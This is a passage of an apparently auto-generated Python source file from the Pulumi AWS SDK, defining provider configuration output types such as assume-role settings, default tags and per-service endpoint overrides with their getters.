] | null | null | null | sdk/python/pulumi_aws/outputs.py | jen20/pulumi-aws | 172e00c642adc03238f89cc9c5a16b914a77c2b1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/outputs.py | jen20/pulumi-aws | 172e00c642adc03238f89cc9c5a16b914a77c2b1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities, _tables
from ._enums import *
__all__ = [
'ProviderAssumeRole',
'ProviderDefaultTags',
'ProviderEndpoint',
'ProviderIgnoreTags',
'GetAmiBlockDeviceMappingResult',
'GetAmiFilterResult',
'GetAmiIdsFilterResult',
'GetAmiProductCodeResult',
'GetAutoscalingGroupsFilterResult',
'GetAvailabilityZoneFilterResult',
'GetAvailabilityZonesFilterResult',
'GetElasticIpFilterResult',
'GetPrefixListFilterResult',
'GetRegionsFilterResult',
]
@pulumi.output_type
class ProviderAssumeRole(dict):
def __init__(__self__, *,
duration_seconds: Optional[int] = None,
external_id: Optional[str] = None,
policy: Optional[str] = None,
policy_arns: Optional[Sequence[str]] = None,
role_arn: Optional[str] = None,
session_name: Optional[str] = None,
tags: Optional[Mapping[str, str]] = None,
transitive_tag_keys: Optional[Sequence[str]] = None):
if duration_seconds is not None:
pulumi.set(__self__, "duration_seconds", duration_seconds)
if external_id is not None:
pulumi.set(__self__, "external_id", external_id)
if policy is not None:
pulumi.set(__self__, "policy", policy)
if policy_arns is not None:
pulumi.set(__self__, "policy_arns", policy_arns)
if role_arn is not None:
pulumi.set(__self__, "role_arn", role_arn)
if session_name is not None:
pulumi.set(__self__, "session_name", session_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if transitive_tag_keys is not None:
pulumi.set(__self__, "transitive_tag_keys", transitive_tag_keys)
@property
@pulumi.getter(name="durationSeconds")
def duration_seconds(self) -> Optional[int]:
return pulumi.get(self, "duration_seconds")
@property
@pulumi.getter(name="externalId")
def external_id(self) -> Optional[str]:
return pulumi.get(self, "external_id")
@property
@pulumi.getter
def policy(self) -> Optional[str]:
return pulumi.get(self, "policy")
@property
@pulumi.getter(name="policyArns")
def policy_arns(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "policy_arns")
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> Optional[str]:
return pulumi.get(self, "role_arn")
@property
@pulumi.getter(name="sessionName")
def session_name(self) -> Optional[str]:
return pulumi.get(self, "session_name")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="transitiveTagKeys")
def transitive_tag_keys(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "transitive_tag_keys")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ProviderDefaultTags(dict):
def __init__(__self__, *,
tags: Optional[Mapping[str, str]] = None):
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
return pulumi.get(self, "tags")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ProviderEndpoint(dict):
def __init__(__self__, *,
accessanalyzer: Optional[str] = None,
acm: Optional[str] = None,
acmpca: Optional[str] = None,
amplify: Optional[str] = None,
apigateway: Optional[str] = None,
applicationautoscaling: Optional[str] = None,
applicationinsights: Optional[str] = None,
appmesh: Optional[str] = None,
appstream: Optional[str] = None,
appsync: Optional[str] = None,
athena: Optional[str] = None,
auditmanager: Optional[str] = None,
autoscaling: Optional[str] = None,
autoscalingplans: Optional[str] = None,
backup: Optional[str] = None,
batch: Optional[str] = None,
budgets: Optional[str] = None,
cloud9: Optional[str] = None,
cloudformation: Optional[str] = None,
cloudfront: Optional[str] = None,
cloudhsm: Optional[str] = None,
cloudsearch: Optional[str] = None,
cloudtrail: Optional[str] = None,
cloudwatch: Optional[str] = None,
cloudwatchevents: Optional[str] = None,
cloudwatchlogs: Optional[str] = None,
codeartifact: Optional[str] = None,
codebuild: Optional[str] = None,
codecommit: Optional[str] = None,
codedeploy: Optional[str] = None,
codepipeline: Optional[str] = None,
codestarconnections: Optional[str] = None,
cognitoidentity: Optional[str] = None,
cognitoidp: Optional[str] = None,
configservice: Optional[str] = None,
connect: Optional[str] = None,
cur: Optional[str] = None,
dataexchange: Optional[str] = None,
datapipeline: Optional[str] = None,
datasync: Optional[str] = None,
dax: Optional[str] = None,
devicefarm: Optional[str] = None,
directconnect: Optional[str] = None,
dlm: Optional[str] = None,
dms: Optional[str] = None,
docdb: Optional[str] = None,
ds: Optional[str] = None,
dynamodb: Optional[str] = None,
ec2: Optional[str] = None,
ecr: Optional[str] = None,
ecrpublic: Optional[str] = None,
ecs: Optional[str] = None,
efs: Optional[str] = None,
eks: Optional[str] = None,
elasticache: Optional[str] = None,
elasticbeanstalk: Optional[str] = None,
elastictranscoder: Optional[str] = None,
elb: Optional[str] = None,
emr: Optional[str] = None,
emrcontainers: Optional[str] = None,
es: Optional[str] = None,
firehose: Optional[str] = None,
fms: Optional[str] = None,
forecast: Optional[str] = None,
fsx: Optional[str] = None,
gamelift: Optional[str] = None,
glacier: Optional[str] = None,
globalaccelerator: Optional[str] = None,
glue: Optional[str] = None,
greengrass: Optional[str] = None,
guardduty: Optional[str] = None,
iam: Optional[str] = None,
identitystore: Optional[str] = None,
imagebuilder: Optional[str] = None,
inspector: Optional[str] = None,
iot: Optional[str] = None,
iotanalytics: Optional[str] = None,
iotevents: Optional[str] = None,
kafka: Optional[str] = None,
kinesis: Optional[str] = None,
kinesisanalytics: Optional[str] = None,
kinesisanalyticsv2: Optional[str] = None,
kinesisvideo: Optional[str] = None,
kms: Optional[str] = None,
lakeformation: Optional[str] = None,
lambda_: Optional[str] = None,
lexmodels: Optional[str] = None,
licensemanager: Optional[str] = None,
lightsail: Optional[str] = None,
macie: Optional[str] = None,
macie2: Optional[str] = None,
managedblockchain: Optional[str] = None,
marketplacecatalog: Optional[str] = None,
mediaconnect: Optional[str] = None,
mediaconvert: Optional[str] = None,
medialive: Optional[str] = None,
mediapackage: Optional[str] = None,
mediastore: Optional[str] = None,
mediastoredata: Optional[str] = None,
mq: Optional[str] = None,
mwaa: Optional[str] = None,
neptune: Optional[str] = None,
networkfirewall: Optional[str] = None,
networkmanager: Optional[str] = None,
opsworks: Optional[str] = None,
organizations: Optional[str] = None,
outposts: Optional[str] = None,
personalize: Optional[str] = None,
pinpoint: Optional[str] = None,
pricing: Optional[str] = None,
qldb: Optional[str] = None,
quicksight: Optional[str] = None,
ram: Optional[str] = None,
rds: Optional[str] = None,
redshift: Optional[str] = None,
resourcegroups: Optional[str] = None,
resourcegroupstaggingapi: Optional[str] = None,
route53: Optional[str] = None,
route53domains: Optional[str] = None,
route53resolver: Optional[str] = None,
s3: Optional[str] = None,
s3control: Optional[str] = None,
s3outposts: Optional[str] = None,
sagemaker: Optional[str] = None,
sdb: Optional[str] = None,
secretsmanager: Optional[str] = None,
securityhub: Optional[str] = None,
serverlessrepo: Optional[str] = None,
servicecatalog: Optional[str] = None,
servicediscovery: Optional[str] = None,
servicequotas: Optional[str] = None,
ses: Optional[str] = None,
shield: Optional[str] = None,
signer: Optional[str] = None,
sns: Optional[str] = None,
sqs: Optional[str] = None,
ssm: Optional[str] = None,
ssoadmin: Optional[str] = None,
stepfunctions: Optional[str] = None,
storagegateway: Optional[str] = None,
sts: Optional[str] = None,
swf: Optional[str] = None,
synthetics: Optional[str] = None,
timestreamwrite: Optional[str] = None,
transfer: Optional[str] = None,
waf: Optional[str] = None,
wafregional: Optional[str] = None,
wafv2: Optional[str] = None,
worklink: Optional[str] = None,
workmail: Optional[str] = None,
workspaces: Optional[str] = None,
xray: Optional[str] = None):
if accessanalyzer is not None:
pulumi.set(__self__, "accessanalyzer", accessanalyzer)
if acm is not None:
pulumi.set(__self__, "acm", acm)
if acmpca is not None:
pulumi.set(__self__, "acmpca", acmpca)
if amplify is not None:
pulumi.set(__self__, "amplify", amplify)
if apigateway is not None:
pulumi.set(__self__, "apigateway", apigateway)
if applicationautoscaling is not None:
pulumi.set(__self__, "applicationautoscaling", applicationautoscaling)
if applicationinsights is not None:
pulumi.set(__self__, "applicationinsights", applicationinsights)
if appmesh is not None:
pulumi.set(__self__, "appmesh", appmesh)
if appstream is not None:
pulumi.set(__self__, "appstream", appstream)
if appsync is not None:
pulumi.set(__self__, "appsync", appsync)
if athena is not None:
pulumi.set(__self__, "athena", athena)
if auditmanager is not None:
pulumi.set(__self__, "auditmanager", auditmanager)
if autoscaling is not None:
pulumi.set(__self__, "autoscaling", autoscaling)
if autoscalingplans is not None:
pulumi.set(__self__, "autoscalingplans", autoscalingplans)
if backup is not None:
pulumi.set(__self__, "backup", backup)
if batch is not None:
pulumi.set(__self__, "batch", batch)
if budgets is not None:
pulumi.set(__self__, "budgets", budgets)
if cloud9 is not None:
pulumi.set(__self__, "cloud9", cloud9)
if cloudformation is not None:
pulumi.set(__self__, "cloudformation", cloudformation)
if cloudfront is not None:
pulumi.set(__self__, "cloudfront", cloudfront)
if cloudhsm is not None:
pulumi.set(__self__, "cloudhsm", cloudhsm)
if cloudsearch is not None:
pulumi.set(__self__, "cloudsearch", cloudsearch)
if cloudtrail is not None:
pulumi.set(__self__, "cloudtrail", cloudtrail)
if cloudwatch is not None:
pulumi.set(__self__, "cloudwatch", cloudwatch)
if cloudwatchevents is not None:
pulumi.set(__self__, "cloudwatchevents", cloudwatchevents)
if cloudwatchlogs is not None:
pulumi.set(__self__, "cloudwatchlogs", cloudwatchlogs)
if codeartifact is not None:
pulumi.set(__self__, "codeartifact", codeartifact)
if codebuild is not None:
pulumi.set(__self__, "codebuild", codebuild)
if codecommit is not None:
pulumi.set(__self__, "codecommit", codecommit)
if codedeploy is not None:
pulumi.set(__self__, "codedeploy", codedeploy)
if codepipeline is not None:
pulumi.set(__self__, "codepipeline", codepipeline)
if codestarconnections is not None:
pulumi.set(__self__, "codestarconnections", codestarconnections)
if cognitoidentity is not None:
pulumi.set(__self__, "cognitoidentity", cognitoidentity)
if cognitoidp is not None:
pulumi.set(__self__, "cognitoidp", cognitoidp)
if configservice is not None:
pulumi.set(__self__, "configservice", configservice)
if connect is not None:
pulumi.set(__self__, "connect", connect)
if cur is not None:
pulumi.set(__self__, "cur", cur)
if dataexchange is not None:
pulumi.set(__self__, "dataexchange", dataexchange)
if datapipeline is not None:
pulumi.set(__self__, "datapipeline", datapipeline)
if datasync is not None:
pulumi.set(__self__, "datasync", datasync)
if dax is not None:
pulumi.set(__self__, "dax", dax)
if devicefarm is not None:
pulumi.set(__self__, "devicefarm", devicefarm)
if directconnect is not None:
pulumi.set(__self__, "directconnect", directconnect)
if dlm is not None:
pulumi.set(__self__, "dlm", dlm)
if dms is not None:
pulumi.set(__self__, "dms", dms)
if docdb is not None:
pulumi.set(__self__, "docdb", docdb)
if ds is not None:
pulumi.set(__self__, "ds", ds)
if dynamodb is not None:
pulumi.set(__self__, "dynamodb", dynamodb)
if ec2 is not None:
pulumi.set(__self__, "ec2", ec2)
if ecr is not None:
pulumi.set(__self__, "ecr", ecr)
if ecrpublic is not None:
pulumi.set(__self__, "ecrpublic", ecrpublic)
if ecs is not None:
pulumi.set(__self__, "ecs", ecs)
if efs is not None:
pulumi.set(__self__, "efs", efs)
if eks is not None:
pulumi.set(__self__, "eks", eks)
if elasticache is not None:
pulumi.set(__self__, "elasticache", elasticache)
if elasticbeanstalk is not None:
pulumi.set(__self__, "elasticbeanstalk", elasticbeanstalk)
if elastictranscoder is not None:
pulumi.set(__self__, "elastictranscoder", elastictranscoder)
if elb is not None:
pulumi.set(__self__, "elb", elb)
if emr is not None:
pulumi.set(__self__, "emr", emr)
if emrcontainers is not None:
pulumi.set(__self__, "emrcontainers", emrcontainers)
if es is not None:
pulumi.set(__self__, "es", es)
if firehose is not None:
pulumi.set(__self__, "firehose", firehose)
if fms is not None:
pulumi.set(__self__, "fms", fms)
if forecast is not None:
pulumi.set(__self__, "forecast", forecast)
if fsx is not None:
pulumi.set(__self__, "fsx", fsx)
if gamelift is not None:
pulumi.set(__self__, "gamelift", gamelift)
if glacier is not None:
pulumi.set(__self__, "glacier", glacier)
if globalaccelerator is not None:
pulumi.set(__self__, "globalaccelerator", globalaccelerator)
if glue is not None:
pulumi.set(__self__, "glue", glue)
if greengrass is not None:
pulumi.set(__self__, "greengrass", greengrass)
if guardduty is not None:
pulumi.set(__self__, "guardduty", guardduty)
if iam is not None:
pulumi.set(__self__, "iam", iam)
if identitystore is not None:
pulumi.set(__self__, "identitystore", identitystore)
if imagebuilder is not None:
pulumi.set(__self__, "imagebuilder", imagebuilder)
if inspector is not None:
pulumi.set(__self__, "inspector", inspector)
if iot is not None:
pulumi.set(__self__, "iot", iot)
if iotanalytics is not None:
pulumi.set(__self__, "iotanalytics", iotanalytics)
if iotevents is not None:
pulumi.set(__self__, "iotevents", iotevents)
if kafka is not None:
pulumi.set(__self__, "kafka", kafka)
if kinesis is not None:
pulumi.set(__self__, "kinesis", kinesis)
if kinesisanalytics is not None:
pulumi.set(__self__, "kinesisanalytics", kinesisanalytics)
if kinesisanalyticsv2 is not None:
pulumi.set(__self__, "kinesisanalyticsv2", kinesisanalyticsv2)
if kinesisvideo is not None:
pulumi.set(__self__, "kinesisvideo", kinesisvideo)
if kms is not None:
pulumi.set(__self__, "kms", kms)
if lakeformation is not None:
pulumi.set(__self__, "lakeformation", lakeformation)
if lambda_ is not None:
pulumi.set(__self__, "lambda_", lambda_)
if lexmodels is not None:
pulumi.set(__self__, "lexmodels", lexmodels)
if licensemanager is not None:
pulumi.set(__self__, "licensemanager", licensemanager)
if lightsail is not None:
pulumi.set(__self__, "lightsail", lightsail)
if macie is not None:
pulumi.set(__self__, "macie", macie)
if macie2 is not None:
pulumi.set(__self__, "macie2", macie2)
if managedblockchain is not None:
pulumi.set(__self__, "managedblockchain", managedblockchain)
if marketplacecatalog is not None:
pulumi.set(__self__, "marketplacecatalog", marketplacecatalog)
if mediaconnect is not None:
pulumi.set(__self__, "mediaconnect", mediaconnect)
if mediaconvert is not None:
pulumi.set(__self__, "mediaconvert", mediaconvert)
if medialive is not None:
pulumi.set(__self__, "medialive", medialive)
if mediapackage is not None:
pulumi.set(__self__, "mediapackage", mediapackage)
if mediastore is not None:
pulumi.set(__self__, "mediastore", mediastore)
if mediastoredata is not None:
pulumi.set(__self__, "mediastoredata", mediastoredata)
if mq is not None:
pulumi.set(__self__, "mq", mq)
if mwaa is not None:
pulumi.set(__self__, "mwaa", mwaa)
if neptune is not None:
pulumi.set(__self__, "neptune", neptune)
if networkfirewall is not None:
pulumi.set(__self__, "networkfirewall", networkfirewall)
if networkmanager is not None:
pulumi.set(__self__, "networkmanager", networkmanager)
if opsworks is not None:
pulumi.set(__self__, "opsworks", opsworks)
if organizations is not None:
pulumi.set(__self__, "organizations", organizations)
if outposts is not None:
pulumi.set(__self__, "outposts", outposts)
if personalize is not None:
pulumi.set(__self__, "personalize", personalize)
if pinpoint is not None:
pulumi.set(__self__, "pinpoint", pinpoint)
if pricing is not None:
pulumi.set(__self__, "pricing", pricing)
if qldb is not None:
pulumi.set(__self__, "qldb", qldb)
if quicksight is not None:
pulumi.set(__self__, "quicksight", quicksight)
if ram is not None:
pulumi.set(__self__, "ram", ram)
if rds is not None:
pulumi.set(__self__, "rds", rds)
if redshift is not None:
pulumi.set(__self__, "redshift", redshift)
if resourcegroups is not None:
pulumi.set(__self__, "resourcegroups", resourcegroups)
if resourcegroupstaggingapi is not None:
pulumi.set(__self__, "resourcegroupstaggingapi", resourcegroupstaggingapi)
if route53 is not None:
pulumi.set(__self__, "route53", route53)
if route53domains is not None:
pulumi.set(__self__, "route53domains", route53domains)
if route53resolver is not None:
pulumi.set(__self__, "route53resolver", route53resolver)
if s3 is not None:
pulumi.set(__self__, "s3", s3)
if s3control is not None:
pulumi.set(__self__, "s3control", s3control)
if s3outposts is not None:
pulumi.set(__self__, "s3outposts", s3outposts)
if sagemaker is not None:
pulumi.set(__self__, "sagemaker", sagemaker)
if sdb is not None:
pulumi.set(__self__, "sdb", sdb)
if secretsmanager is not None:
pulumi.set(__self__, "secretsmanager", secretsmanager)
if securityhub is not None:
pulumi.set(__self__, "securityhub", securityhub)
if serverlessrepo is not None:
pulumi.set(__self__, "serverlessrepo", serverlessrepo)
if servicecatalog is not None:
pulumi.set(__self__, "servicecatalog", servicecatalog)
if servicediscovery is not None:
pulumi.set(__self__, "servicediscovery", servicediscovery)
if servicequotas is not None:
pulumi.set(__self__, "servicequotas", servicequotas)
if ses is not None:
pulumi.set(__self__, "ses", ses)
if shield is not None:
pulumi.set(__self__, "shield", shield)
if signer is not None:
pulumi.set(__self__, "signer", signer)
if sns is not None:
pulumi.set(__self__, "sns", sns)
if sqs is not None:
pulumi.set(__self__, "sqs", sqs)
if ssm is not None:
pulumi.set(__self__, "ssm", ssm)
if ssoadmin is not None:
pulumi.set(__self__, "ssoadmin", ssoadmin)
if stepfunctions is not None:
pulumi.set(__self__, "stepfunctions", stepfunctions)
if storagegateway is not None:
pulumi.set(__self__, "storagegateway", storagegateway)
if sts is not None:
pulumi.set(__self__, "sts", sts)
if swf is not None:
pulumi.set(__self__, "swf", swf)
if synthetics is not None:
pulumi.set(__self__, "synthetics", synthetics)
if timestreamwrite is not None:
pulumi.set(__self__, "timestreamwrite", timestreamwrite)
if transfer is not None:
pulumi.set(__self__, "transfer", transfer)
if waf is not None:
pulumi.set(__self__, "waf", waf)
if wafregional is not None:
pulumi.set(__self__, "wafregional", wafregional)
if wafv2 is not None:
pulumi.set(__self__, "wafv2", wafv2)
if worklink is not None:
pulumi.set(__self__, "worklink", worklink)
if workmail is not None:
pulumi.set(__self__, "workmail", workmail)
if workspaces is not None:
pulumi.set(__self__, "workspaces", workspaces)
if xray is not None:
pulumi.set(__self__, "xray", xray)
@property
@pulumi.getter
def accessanalyzer(self) -> Optional[str]:
return pulumi.get(self, "accessanalyzer")
@property
@pulumi.getter
def acm(self) -> Optional[str]:
return pulumi.get(self, "acm")
@property
@pulumi.getter
def acmpca(self) -> Optional[str]:
return pulumi.get(self, "acmpca")
@property
@pulumi.getter
def amplify(self) -> Optional[str]:
return pulumi.get(self, "amplify")
@property
@pulumi.getter
def apigateway(self) -> Optional[str]:
return pulumi.get(self, "apigateway")
@property
@pulumi.getter
def applicationautoscaling(self) -> Optional[str]:
return pulumi.get(self, "applicationautoscaling")
@property
@pulumi.getter
def applicationinsights(self) -> Optional[str]:
return pulumi.get(self, "applicationinsights")
@property
@pulumi.getter
def appmesh(self) -> Optional[str]:
return pulumi.get(self, "appmesh")
@property
@pulumi.getter
def appstream(self) -> Optional[str]:
return pulumi.get(self, "appstream")
@property
@pulumi.getter
def appsync(self) -> Optional[str]:
return pulumi.get(self, "appsync")
@property
@pulumi.getter
def athena(self) -> Optional[str]:
return pulumi.get(self, "athena")
@property
@pulumi.getter
def auditmanager(self) -> Optional[str]:
return pulumi.get(self, "auditmanager")
@property
@pulumi.getter
def autoscaling(self) -> Optional[str]:
return pulumi.get(self, "autoscaling")
@property
@pulumi.getter
def autoscalingplans(self) -> Optional[str]:
return pulumi.get(self, "autoscalingplans")
@property
@pulumi.getter
def backup(self) -> Optional[str]:
return pulumi.get(self, "backup")
@property
@pulumi.getter
def batch(self) -> Optional[str]:
return pulumi.get(self, "batch")
@property
@pulumi.getter
def budgets(self) -> Optional[str]:
return pulumi.get(self, "budgets")
@property
@pulumi.getter
def cloud9(self) -> Optional[str]:
return pulumi.get(self, "cloud9")
@property
@pulumi.getter
def cloudformation(self) -> Optional[str]:
return pulumi.get(self, "cloudformation")
@property
@pulumi.getter
def cloudfront(self) -> Optional[str]:
return pulumi.get(self, "cloudfront")
@property
@pulumi.getter
def cloudhsm(self) -> Optional[str]:
return pulumi.get(self, "cloudhsm")
@property
@pulumi.getter
def cloudsearch(self) -> Optional[str]:
return pulumi.get(self, "cloudsearch")
@property
@pulumi.getter
def cloudtrail(self) -> Optional[str]:
return pulumi.get(self, "cloudtrail")
@property
@pulumi.getter
def cloudwatch(self) -> Optional[str]:
return pulumi.get(self, "cloudwatch")
@property
@pulumi.getter
def cloudwatchevents(self) -> Optional[str]:
return pulumi.get(self, "cloudwatchevents")
@property
@pulumi.getter
def cloudwatchlogs(self) -> Optional[str]:
return pulumi.get(self, "cloudwatchlogs")
@property
@pulumi.getter
def codeartifact(self) -> Optional[str]:
return pulumi.get(self, "codeartifact")
@property
@pulumi.getter
def codebuild(self) -> Optional[str]:
return pulumi.get(self, "codebuild")
@property
@pulumi.getter
def codecommit(self) -> Optional[str]:
return pulumi.get(self, "codecommit")
@property
@pulumi.getter
def codedeploy(self) -> Optional[str]:
return pulumi.get(self, "codedeploy")
@property
@pulumi.getter
def codepipeline(self) -> Optional[str]:
return pulumi.get(self, "codepipeline")
@property
@pulumi.getter
def codestarconnections(self) -> Optional[str]:
return pulumi.get(self, "codestarconnections")
@property
@pulumi.getter
def cognitoidentity(self) -> Optional[str]:
return pulumi.get(self, "cognitoidentity")
@property
@pulumi.getter
def cognitoidp(self) -> Optional[str]:
return pulumi.get(self, "cognitoidp")
@property
@pulumi.getter
def configservice(self) -> Optional[str]:
return pulumi.get(self, "configservice")
@property
@pulumi.getter
def connect(self) -> Optional[str]:
return pulumi.get(self, "connect")
@property
@pulumi.getter
def cur(self) -> Optional[str]:
return pulumi.get(self, "cur")
@property
@pulumi.getter
def dataexchange(self) -> Optional[str]:
return pulumi.get(self, "dataexchange")
@property
@pulumi.getter
def datapipeline(self) -> Optional[str]:
return pulumi.get(self, "datapipeline")
@property
@pulumi.getter
def datasync(self) -> Optional[str]:
return pulumi.get(self, "datasync")
@property
@pulumi.getter
def dax(self) -> Optional[str]:
return pulumi.get(self, "dax")
@property
@pulumi.getter
def devicefarm(self) -> Optional[str]:
return pulumi.get(self, "devicefarm")
@property
@pulumi.getter
def directconnect(self) -> Optional[str]:
return pulumi.get(self, "directconnect")
@property
@pulumi.getter
def dlm(self) -> Optional[str]:
return pulumi.get(self, "dlm")
@property
@pulumi.getter
def dms(self) -> Optional[str]:
return pulumi.get(self, "dms")
@property
@pulumi.getter
def docdb(self) -> Optional[str]:
return pulumi.get(self, "docdb")
@property
@pulumi.getter
def ds(self) -> Optional[str]:
return pulumi.get(self, "ds")
@property
@pulumi.getter
def dynamodb(self) -> Optional[str]:
return pulumi.get(self, "dynamodb")
@property
@pulumi.getter
def ec2(self) -> Optional[str]:
return pulumi.get(self, "ec2")
@property
@pulumi.getter
def ecr(self) -> Optional[str]:
return pulumi.get(self, "ecr")
@property
@pulumi.getter
def ecrpublic(self) -> Optional[str]:
return pulumi.get(self, "ecrpublic")
@property
@pulumi.getter
def ecs(self) -> Optional[str]:
return pulumi.get(self, "ecs")
@property
@pulumi.getter
def efs(self) -> Optional[str]:
return pulumi.get(self, "efs")
@property
@pulumi.getter
def eks(self) -> Optional[str]:
return pulumi.get(self, "eks")
@property
@pulumi.getter
def elasticache(self) -> Optional[str]:
return pulumi.get(self, "elasticache")
@property
@pulumi.getter
def elasticbeanstalk(self) -> Optional[str]:
return pulumi.get(self, "elasticbeanstalk")
@property
@pulumi.getter
def elastictranscoder(self) -> Optional[str]:
return pulumi.get(self, "elastictranscoder")
@property
@pulumi.getter
def elb(self) -> Optional[str]:
return pulumi.get(self, "elb")
@property
@pulumi.getter
def emr(self) -> Optional[str]:
return pulumi.get(self, "emr")
@property
@pulumi.getter
def emrcontainers(self) -> Optional[str]:
return pulumi.get(self, "emrcontainers")
@property
@pulumi.getter
def es(self) -> Optional[str]:
return pulumi.get(self, "es")
@property
@pulumi.getter
def firehose(self) -> Optional[str]:
return pulumi.get(self, "firehose")
@property
@pulumi.getter
def fms(self) -> Optional[str]:
return pulumi.get(self, "fms")
@property
@pulumi.getter
def forecast(self) -> Optional[str]:
return pulumi.get(self, "forecast")
@property
@pulumi.getter
def fsx(self) -> Optional[str]:
return pulumi.get(self, "fsx")
@property
@pulumi.getter
def gamelift(self) -> Optional[str]:
return pulumi.get(self, "gamelift")
@property
@pulumi.getter
def glacier(self) -> Optional[str]:
return pulumi.get(self, "glacier")
@property
@pulumi.getter
def globalaccelerator(self) -> Optional[str]:
return pulumi.get(self, "globalaccelerator")
@property
@pulumi.getter
def glue(self) -> Optional[str]:
return pulumi.get(self, "glue")
@property
@pulumi.getter
def greengrass(self) -> Optional[str]:
return pulumi.get(self, "greengrass")
@property
@pulumi.getter
def guardduty(self) -> Optional[str]:
return pulumi.get(self, "guardduty")
@property
@pulumi.getter
def iam(self) -> Optional[str]:
return pulumi.get(self, "iam")
@property
@pulumi.getter
def identitystore(self) -> Optional[str]:
return pulumi.get(self, "identitystore")
@property
@pulumi.getter
def imagebuilder(self) -> Optional[str]:
return pulumi.get(self, "imagebuilder")
@property
@pulumi.getter
def inspector(self) -> Optional[str]:
return pulumi.get(self, "inspector")
@property
@pulumi.getter
def iot(self) -> Optional[str]:
return pulumi.get(self, "iot")
@property
@pulumi.getter
def iotanalytics(self) -> Optional[str]:
return pulumi.get(self, "iotanalytics")
@property
@pulumi.getter
def iotevents(self) -> Optional[str]:
return pulumi.get(self, "iotevents")
@property
@pulumi.getter
def kafka(self) -> Optional[str]:
return pulumi.get(self, "kafka")
@property
@pulumi.getter
def kinesis(self) -> Optional[str]:
return pulumi.get(self, "kinesis")
@property
@pulumi.getter
def kinesisanalytics(self) -> Optional[str]:
return pulumi.get(self, "kinesisanalytics")
@property
@pulumi.getter
def kinesisanalyticsv2(self) -> Optional[str]:
return pulumi.get(self, "kinesisanalyticsv2")
@property
@pulumi.getter
def kinesisvideo(self) -> Optional[str]:
return pulumi.get(self, "kinesisvideo")
@property
@pulumi.getter
def kms(self) -> Optional[str]:
return pulumi.get(self, "kms")
@property
@pulumi.getter
def lakeformation(self) -> Optional[str]:
return pulumi.get(self, "lakeformation")
@property
@pulumi.getter(name="lambda")
def lambda_(self) -> Optional[str]:
return pulumi.get(self, "lambda_")
@property
@pulumi.getter
def lexmodels(self) -> Optional[str]:
return pulumi.get(self, "lexmodels")
@property
@pulumi.getter
def licensemanager(self) -> Optional[str]:
return pulumi.get(self, "licensemanager")
@property
@pulumi.getter
def lightsail(self) -> Optional[str]:
return pulumi.get(self, "lightsail")
@property
@pulumi.getter
def macie(self) -> Optional[str]:
return pulumi.get(self, "macie")
@property
@pulumi.getter
def macie2(self) -> Optional[str]:
return pulumi.get(self, "macie2")
@property
@pulumi.getter
def managedblockchain(self) -> Optional[str]:
return pulumi.get(self, "managedblockchain")
@property
@pulumi.getter
def marketplacecatalog(self) -> Optional[str]:
return pulumi.get(self, "marketplacecatalog")
@property
@pulumi.getter
def mediaconnect(self) -> Optional[str]:
return pulumi.get(self, "mediaconnect")
@property
@pulumi.getter
def mediaconvert(self) -> Optional[str]:
return pulumi.get(self, "mediaconvert")
@property
@pulumi.getter
def medialive(self) -> Optional[str]:
return pulumi.get(self, "medialive")
@property
@pulumi.getter
def mediapackage(self) -> Optional[str]:
return pulumi.get(self, "mediapackage")
@property
@pulumi.getter
def mediastore(self) -> Optional[str]:
return pulumi.get(self, "mediastore")
@property
@pulumi.getter
def mediastoredata(self) -> Optional[str]:
return pulumi.get(self, "mediastoredata")
@property
@pulumi.getter
def mq(self) -> Optional[str]:
return pulumi.get(self, "mq")
@property
@pulumi.getter
def mwaa(self) -> Optional[str]:
return pulumi.get(self, "mwaa")
@property
@pulumi.getter
def neptune(self) -> Optional[str]:
return pulumi.get(self, "neptune")
@property
@pulumi.getter
def networkfirewall(self) -> Optional[str]:
return pulumi.get(self, "networkfirewall")
@property
@pulumi.getter
def networkmanager(self) -> Optional[str]:
return pulumi.get(self, "networkmanager")
@property
@pulumi.getter
def opsworks(self) -> Optional[str]:
return pulumi.get(self, "opsworks")
@property
@pulumi.getter
def organizations(self) -> Optional[str]:
return pulumi.get(self, "organizations")
@property
@pulumi.getter
def outposts(self) -> Optional[str]:
return pulumi.get(self, "outposts")
@property
@pulumi.getter
def personalize(self) -> Optional[str]:
return pulumi.get(self, "personalize")
@property
@pulumi.getter
def pinpoint(self) -> Optional[str]:
return pulumi.get(self, "pinpoint")
@property
@pulumi.getter
def pricing(self) -> Optional[str]:
return pulumi.get(self, "pricing")
@property
@pulumi.getter
def qldb(self) -> Optional[str]:
return pulumi.get(self, "qldb")
@property
@pulumi.getter
def quicksight(self) -> Optional[str]:
return pulumi.get(self, "quicksight")
@property
@pulumi.getter
def ram(self) -> Optional[str]:
return pulumi.get(self, "ram")
@property
@pulumi.getter
def rds(self) -> Optional[str]:
return pulumi.get(self, "rds")
@property
@pulumi.getter
def redshift(self) -> Optional[str]:
return pulumi.get(self, "redshift")
@property
@pulumi.getter
def resourcegroups(self) -> Optional[str]:
return pulumi.get(self, "resourcegroups")
@property
@pulumi.getter
def resourcegroupstaggingapi(self) -> Optional[str]:
return pulumi.get(self, "resourcegroupstaggingapi")
@property
@pulumi.getter
def route53(self) -> Optional[str]:
return pulumi.get(self, "route53")
@property
@pulumi.getter
def route53domains(self) -> Optional[str]:
return pulumi.get(self, "route53domains")
@property
@pulumi.getter
def route53resolver(self) -> Optional[str]:
return pulumi.get(self, "route53resolver")
@property
@pulumi.getter
def s3(self) -> Optional[str]:
return pulumi.get(self, "s3")
@property
@pulumi.getter
def s3control(self) -> Optional[str]:
return pulumi.get(self, "s3control")
@property
@pulumi.getter
